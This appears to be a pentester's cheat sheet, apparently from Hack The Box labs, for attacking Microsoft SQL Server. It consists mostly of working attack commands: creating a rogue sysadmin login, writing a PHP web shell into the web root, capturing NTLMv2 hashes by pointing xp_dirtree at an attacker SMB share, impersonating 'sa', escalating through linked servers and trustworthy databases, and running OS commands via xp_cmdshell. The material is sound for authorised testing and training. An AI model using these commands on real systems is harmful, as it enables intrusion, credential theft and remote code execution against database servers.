master - keeps the information for an instance of SQL Server.
msdb - used by SQL Server Agent.
model - a template database copied for each new database.
resource - a read-only database that keeps system objects visible in every database on the server in sys schema.
tempdb - keeps temporary objects for SQL queries.
Basic Enumeration
# Get version
select @@version;
# Get user
select user_name();
# Get databases
SELECT name FROM master.dbo.sysdatabases;
# Use database
USE master
#Get table names
SELECT * FROM <databaseName>.INFORMATION_SCHEMA.TABLES;
#List Linked Servers
EXEC sp_linkedservers
SELECT * FROM sys.servers;
#List users
select sp.name as login, sp.type_desc as login_type, sl.password_hash, sp.create_date, sp.modify_date, case when sp.is_disabled = 1 then 'Disabled' else 'Enabled' end as status from sys.server_principals sp left join sys.sql_logins sl on sp.principal_id = sl.principal_id where sp.type not in ('G', 'R') order by sp.name;
#Create user with sysadmin privs
CREATE LOGIN hacker WITH PASSWORD = 'P@ssword123!'
EXEC sp_addsrvrolemember 'hacker', 'sysadmin'
#Get Servername
select @@servername
#Enumerate links
enum_links
#Use a link
use_link [NAME]
#Enumeration MSSQL by using nmap
Intrusionz3r0X@htb[/htb]$ sudo nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 10.129.201.248
#Metasploit enumeration.
auxiliary/scanner/mssql/mssql_ping
#Interact with MSSQL
Intrusionz3r0X@htb[/htb]$ impacket-mssqlclient Administrator@10.129.201.248 -windows-auth
Intrusionz3r0X@htb[/htb]$ impacket-mssqlclient [-db volume] <DOMAIN>/<USERNAME>:<PASSWORD>@<IP>
Intrusionz3r0X@htb[/htb]$ impacket-mssqlclient [-db volume] -windows-auth <DOMAIN>/<USERNAME>:<PASSWORD>@<IP>
# Using sqsh (sqsh If you are on linux)
Intrusionz3r0X@htb[/htb]$ sqsh -S <IP> -U <Username> -P <Password> -D <Database>
## In case Windows Auth using "." as domain name for local user
Intrusionz3r0X@htb[/htb]$ sqsh -S <IP> -U .\\<Username> -P <Password> -D <Database>
Intrusionz3r0X@htb[/htb]$ sqsh -S 10.129.203.7 -U .\\julio -P 'MyPassword!'
## In sqsh you need to use GO after writting the query to send it
1> select 1;
2> go
## MYSQL (Port: 3306)
#Windows (SQLCMD if you are on Windows)
C:\htb> sqlcmd -S 10.129.20.13 -U username -P Password123
C:\htb> sqlcmd -S SRVMSSQL -U julio -P 'MyPassword!' -y 30 -Y 30
#Enable Ole automation to allow us write files
1> sp_configure 'show advanced options', 1
2> GO
3> RECONFIGURE
4> GO
5> sp_configure 'Ole Automation Procedures', 1
6> GO
7> RECONFIGURE
8> GO
#Create file
1> DECLARE @OLE INT
2> DECLARE @FileID INT
3> EXECUTE sp_OACreate 'Scripting.FileSystemObject', @OLE OUT
4> EXECUTE sp_OAMethod @OLE, 'OpenTextFile', @FileID OUT, 'c:\inetpub\wwwroot\webshell.php', 8, 1
5> EXECUTE sp_OAMethod @FileID, 'WriteLine', Null, '<?php echo shell_exec($_GET["c"]);?>'
6> EXECUTE sp_OADestroy @FileID
7> EXECUTE sp_OADestroy @OLE
8> GO
Read Local Files
#Read Local Files in MSSQL
1> EXECUTE('SELECT * FROM OPENROWSET(BULK N''C:\\Windows\\System32\\drivers\\etc\\hosts'', SINGLE_CLOB) AS Contents') AT [LOCAL.TEST.LINKED.SRV];
2> GO
Capture NTLMv2 Hash
#Capture NTLMv2 through the MSSQL by using xp_dirtree
# 1. Start SMB Server
Intrusionz3r0X@htb[/htb]$ sudo responder -I tun0
Intrusionz3r0X@htb[/htb]$ sudo impacket-smbserver share ./ -smb2support
#2. Use the desire method
1> EXEC master..xp_dirtree '\\10.10.110.17\share\'
2> GO
#Capture NTLMv2 through the MSSQL by using xp_subdirs
1> EXEC master..xp_subdirs '\\10.10.110.17\share\"
2> GO
Impersonate Users
It's recommended to run EXECUTE AS LOGIN within the master DB
#----------Impersonate Existing Users with MSSQL----------
1> USE master
2> GO
#Identify Users that We Can Impersonate
SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE'
1> SELECT distinct b.name
2> FROM sys.server_permissions a
3> INNER JOIN sys.server_principals b
4> ON a.grantor_principal_id = b.principal_id
5> WHERE a.permission_name = 'IMPERSONATE'
6> GO
#Verifying our Current User and Role (0:Non-SysAdmin 1:SysAdmin)
1> SELECT SYSTEM_USER
2> SELECT IS_SRVROLEMEMBER('sysadmin')
3> go
#Impersonating the SA User
1> EXECUTE AS LOGIN = 'sa'
2> SELECT SYSTEM_USER
3> SELECT IS_SRVROLEMEMBER('sysadmin')
4> GO
Linked Servers exploitation on MSSQL
Note: If we need to use quotes in our query to the linked server, we need to use single double quotes to escape the single quote. To run multiples commands at once we can divide them up with a semi colon (;).
#Communicate with Other Databases with MSSQL using a Linked servers
#remote server [1]
#linked server. [0]
#Identify linked Servers in MSSQL
1> SELECT srvname, isremote FROM sysservers
2> GO
#Execute command in linked server.
1> EXECUTE('select @@servername, @@version, system_user, is_srvrolemember(''sysadmin'')') AT [10.0.0.12\SQLEXPRESS]
2> GO
Cross Forest SQL Server Links Abuse
#Enumerate SQL Server Links
PS C:\Tools> import-module .\PowerUpSQL.ps1
PS C:\Tools> Get-SQLServerLink
#Enumerate Logins righs for Jimmy
PS C:\Tools> Get-SQLQuery -Query "EXEC sp_helplinkedsrvlogin"
Check the attributes LocalLogin and RemoteLogin to determine if your user can authenticate as Sysadmin on the linked server
Exploitation on Windows
#verify if the current user has SA admins rights on linked server (1:sysadmin)
select * from openquery("SQL02\SQLEXPRESS",'select IS_SRVROLEMEMBER(''sysadmin'')')
#Enable XP_CMDSHELL
EXECUTE('sp_configure ''xp_cmdshell'',1;reconfigure;') AT "SQL02\SQLEXPRESS"
#Execute commands
EXECUTE('xp_cmdshell "whoami"') AT "SQL02\SQLEXPRESS"
Exploitation on Linux
#Authenticate on MSSQL
Intrusionz3r0@htb[/htb]$ mssqlclient.py jimmy@10.129.229.188 -windows-auth
#Enumerate SQL Server Links and Login Rights
SQL (inlanefreight\jimmy guest@master)> enum_links
#User Link server
SQL (inlanefreight\jimmy guest@master)> use_link "SQL02\SQLEXPRESS"
#Enable XP_CMDSHELl
SQL >"SQL02\SQLEXPRESS" (sa dbo@master)> enable_xp_cmdshell
#Execute commands
SQL >"SQL02\SQLEXPRESS" (sa dbo@master)> xp_cmdshell whoami
Trustworthy Databases
If our user hasn't been granted remote login permissions as a sysadmin (sa), but instead has been provided public privileges as a local SQL User.we can pursue a strategy to enumerate trusted databases on the targeted linked server. Our objective would be to determine if the user holds the db_owner role for any trusted database. If such a database is identified, we can create a stored procedure to enable xp_cmdshell, ensuring it executes under the context of the OWNER, which typically would be the sa user.
Requirements
Identified a trustworthy database
Confirmed that our current user login name
Confirm our current user has db_owner privileges roles on database
#Retrieve the login identification name
select * from openquery("SQL02\SQLEXPRESS",'select SUSER_NAME()')
#Check if we have public access rights
select * from openquery("SQL02\SQLEXPRESS",'select IS_SRVROLEMEMBER(''public'')')
select * from openquery("SQL02\SQLEXPRESS",'select IS_SRVROLEMEMBER(''sysadmin'')')
#Retrieve Databases
select * from openquery("SQL02\SQLEXPRESS",'select name FROM master.dbo.sysdatabases')
#dentify databases have trust worthy enabled (1: trustworthiness enabled)
select * from openquery("SQL02\SQLEXPRESS",'SELECT a.name,b.is_trustworthy_on FROM master..sysdatabases as a INNER JOIN sys.databases as b ON a.name=b.name;')
#Verify if our user had db_owner role
EXEC ('sp_helpuser') AT "SQL02\SQLEXPRESS"
#Verify the owner of the database (1: owner=sa)
select * from openquery("SQL02\SQLEXPRESS",'SELECT name as database_name , SUSER_NAME(owner_sid) AS owner , is_trustworthy_on AS TRUSTWORTHY from sys.databases;')
Exploitation on Windows
#verify if the IS_RPC_OUT_ENABLED option is enabled.
select is_rpc_out_enabled from sys.servers where name='SQL02\SQLEXPRESS'
#Create procedure as sysadmin
EXEC ('CREATE PROCEDURE sp_escalate WITH EXECUTE AS OWNER AS EXEC sp_addsrvrolemember ''htb-dbuser'',''sysadmin''') AT "SQL02\SQLEXPRESS"
#verify the privileges of the current user once again
EXEC ('sp_escalate;SELECT IS_SRVROLEMEMBER(''sysadmin'');
SELECT SUSER_NAME()') AT "SQL02\SQLEXPRESS"
#Enable XP_CMDShell
EXECUTE('sp_configure ''xp_cmdshell'',1;reconfigure;') AT "SQL02\SQLEXPRESS"
#Execute commands:
EXECUTE('xp_cmdshell "whoami"') AT "SQL02\SQLEXPRESS"
Exploitation on Linux
#Enumerate linked database
enum_links
#Use a linked server
use_link "SQL02\SQLEXPRESS"
#Enumerate Trushworthy Databases (1:enabled)
enum_db
#verify whether our currently identified user holds the db_owner role
enum_users
#Verify databases owners
SELECT name as database_name, SUSER_NAME(owner_sid) AS owner, is_trustworthy_on AS TRUSTWORTHY from sys.databases;
#Use database
USE "htb-reports"
#Create Procedure
CREATE PROCEDURE sp_escalate WITH EXECUTE AS OWNER AS EXEC sp_addsrvrolemember 'htb-dbuser','sysadmin'
#Execute Procedure
EXEC sp_escalate
#Verify the Sysadmin right on current user
SELECT is_srvrolemember('sysadmin')
#Enable XP_CMDSHELL
exec master.dbo.sp_configure "show advanced options",1;RECONFIGURE;exec master.dbo.sp_configure "xp_cmdshell", 1;RECONFIGURE;
#Execute commands
exec master..xp_cmdshell "whoami"
